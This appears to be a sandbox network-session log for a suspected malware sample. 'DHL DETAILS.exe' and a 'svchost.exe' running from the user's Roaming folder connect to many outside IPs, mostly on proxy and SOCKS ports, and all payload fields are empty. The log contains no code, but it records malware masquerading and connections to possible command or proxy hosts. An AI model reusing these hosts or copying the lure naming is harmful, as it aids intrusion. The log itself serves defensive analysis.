Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5220	192.168.2.5	50532	104.21.80.83	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5221	192.168.2.5	50354	218.252.244.126	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5222	192.168.2.5	50856	93.190.24.119	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5223	192.168.2.5	50858	93.190.24.119	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5224	192.168.2.5	50859	93.190.24.119	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5225	192.168.2.5	50371	20.111.54.16	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5226	192.168.2.5	50376	16.162.211.90	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5227	192.168.2.5	50909	43.157.44.79	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5228	192.168.2.5	50912	43.157.44.79	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5229	192.168.2.5	50919	43.157.44.79	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5230	192.168.2.5	50926	43.157.44.79	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5231	192.168.2.5	64891	176.241.143.197	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5232	192.168.2.5	50946	43.157.50.206	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5233	192.168.2.5	50949	43.157.50.206	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5234	192.168.2.5	49418	5.10.249.159	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5235	192.168.2.5	50950	43.157.50.206	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5236	192.168.2.5	50372	194.247.173.17	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5237	192.168.2.5	50952	43.157.50.206	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5238	192.168.2.5	51093	45.144.30.232	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5239	192.168.2.5	51095	45.144.30.232	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5240	192.168.2.5	51097	45.144.30.232	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5241	192.168.2.5	51107	45.144.30.232	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5242	192.168.2.5	50449	140.238.25.255	21000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5243	192.168.2.5	50639	185.162.230.178	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5244	192.168.2.5	63539	91.134.140.160	12217	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5245	192.168.2.5	50667	104.17.9.114	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5246	192.168.2.5	50391	8.219.177.134	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5247	192.168.2.5	50688	173.245.49.27	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5248	192.168.2.5	50705	31.43.179.214	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5249	192.168.2.5	50713	104.20.123.164	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5250	192.168.2.5	50403	122.51.123.219	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5251	192.168.2.5	50499	193.84.89.202	8443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5252	192.168.2.5	65004	51.15.133.214	16379	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5253	192.168.2.5	50799	104.21.194.182	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5254	192.168.2.5	50406	91.202.230.219	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5255	192.168.2.5	50500	86.8.163.88	9150	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5256	192.168.2.5	50823	172.67.182.102	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5257	192.168.2.5	65055	51.222.241.157	51718	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5258	192.168.2.5	50753	103.152.112.167	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5259	192.168.2.5	50399	218.65.6.150	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5260	192.168.2.5	50595	82.210.56.251	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5261	192.168.2.5	50645	64.56.150.102	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5262	192.168.2.5	49306	36.134.91.82	8888	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5263	192.168.2.5	50825	157.185.157.151	26589	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5264	192.168.2.5	65065	190.103.61.254	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5265	192.168.2.5	50965	74.48.7.43	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5266	192.168.2.5	63603	60.188.102.225	18080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5267	192.168.2.5	51148	172.67.181.85	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5268	192.168.2.5	50565	93.171.220.229	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5269	192.168.2.5	65146	206.81.31.215	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5270	192.168.2.5	63552	195.248.243.149	7237	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5271	192.168.2.5	51183	132.148.244.30	44957	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5272	192.168.2.5	51204	192.64.115.90	47100	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5273	192.168.2.5	65081	81.16.1.187	32650	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5274	192.168.2.5	50643	82.137.244.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5275	192.168.2.5	50773	221.194.149.8	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5276	192.168.2.5	50797	216.9.224.113	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5277	192.168.2.5	50895	104.129.199.57	8800	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5278	192.168.2.5	51156	198.12.253.117	31131	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5279	192.168.2.5	65144	79.143.187.58	18990	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5280	192.168.2.5	51149	191.102.159.157	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5281	192.168.2.5	51191	45.196.151.120	5432	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5282	192.168.2.5	51215	159.65.233.115	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5283	192.168.2.5	50913	43.128.146.42	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5284	192.168.2.5	51151	167.71.5.83	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5285	192.168.2.5	50559	121.159.146.251	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5286	192.168.2.5	50611	120.48.62.239	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5287	192.168.2.5	51031	104.17.248.164	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5288	192.168.2.5	51064	172.67.181.12	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5289	192.168.2.5	51071	104.16.108.204	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5290	192.168.2.5	50847	3.9.71.167	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5291	192.168.2.5	51007	198.199.86.11	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5292	192.168.2.5	50712	103.23.100.1	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5293	192.168.2.5	51229	46.17.63.166	4154	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5294	192.168.2.5	50970	92.204.134.38	25825	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5295	192.168.2.5	51069	162.243.102.207	9764	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5296	192.168.2.5	51241	61.111.38.5	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5297	192.168.2.5	50927	154.12.178.107	29985	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5298	192.168.2.5	50865	190.128.228.182	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5299	192.168.2.5	51028	152.70.244.240	16238	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5300	192.168.2.5	50948	170.64.222.86	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5301	192.168.2.5	51024	79.110.196.145	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5302	192.168.2.5	51079	47.243.205.1	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5303	192.168.2.5	51065	138.36.150.16	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5304	192.168.2.5	51213	47.114.101.57	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5305	192.168.2.5	61737	162.214.227.68	60433	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5306	192.168.2.5	65312	103.118.127.218	6969	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5307	192.168.2.5	49656	192.252.216.81	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5308	192.168.2.5	51165	222.179.155.90	9091	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5309	192.168.2.5	51166	51.161.131.84	63055	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5310	192.168.2.5	50910	103.127.1.130	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5311	192.168.2.5	61656	92.204.135.37	32524	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5312	192.168.2.5	51111	49.228.131.169	5000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5313	192.168.2.5	51246	211.222.252.187	8193	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5314	192.168.2.5	65248	117.30.118.200	8118	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5315	192.168.2.5	63623	51.15.234.222	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5316	192.168.2.5	63674	128.199.165.63	33574	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5317	192.168.2.5	51035	51.68.164.77	32824	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5318	192.168.2.5	51267	74.48.7.43	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5319	192.168.2.5	51376	43.157.32.230	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5320	192.168.2.5	51377	43.157.32.230	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5321	192.168.2.5	51378	43.157.32.230	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5322	192.168.2.5	51380	43.157.32.230	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5323	192.168.2.5	63682	45.11.95.165	6039	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5324	192.168.2.5	51248	202.150.1.87	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5325	192.168.2.5	50264	142.54.232.6	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5326	192.168.2.5	49545	72.167.38.7	45650	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5327	192.168.2.5	61658	176.8.230.197	8187	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5328	192.168.2.5	51245	90.188.250.16	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5329	192.168.2.5	49573	115.96.208.124	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5330	192.168.2.5	51282	3.212.148.199	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5331	192.168.2.5	51283	157.185.157.151	26589	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5332	192.168.2.5	49568	177.234.194.155	999	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5333	192.168.2.5	63697	34.125.246.223	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5334	192.168.2.5	51251	5.44.42.115	58386	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5335	192.168.2.5	51289	107.180.90.88	55347	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5336	192.168.2.5	51313	172.64.207.185	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5337	192.168.2.5	65289	72.217.158.202	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5338	192.168.2.5	51352	185.162.231.226	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5339	192.168.2.5	51305	142.4.123.41	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5340	192.168.2.5	51334	104.17.16.87	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5341	192.168.2.5	49509	148.72.206.250	35703	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5342	192.168.2.5	51270	194.247.173.17	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5343	192.168.2.5	51409	45.12.31.140	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5344	192.168.2.5	51429	104.22.14.48	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5345	192.168.2.5	49477	222.223.103.232	7302	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5346	192.168.2.5	49487	94.23.252.168	9180	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5347	192.168.2.5	51306	162.243.102.207	9764	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5348	192.168.2.5	61749	146.59.18.246	40975	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5349	192.168.2.5	51540	172.67.250.212	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5350	192.168.2.5	51528	185.162.228.48	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5351	192.168.2.5	51469	104.17.239.10	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5352	192.168.2.5	51706	61.130.9.38	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5353	192.168.2.5	51714	61.130.9.38	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5354	192.168.2.5	51609	104.16.224.33	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5355	192.168.2.5	51716	61.130.9.38	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5356	192.168.2.5	51299	121.159.146.251	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5357	192.168.2.5	51729	61.130.9.38	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5358	192.168.2.5	51530	164.92.86.113	54093	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5359	192.168.2.5	51458	162.214.227.68	56796	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5360	192.168.2.5	63713	37.187.91.192	21981	56176	C:\Users\user\AppData\Roaming\svchost.exe

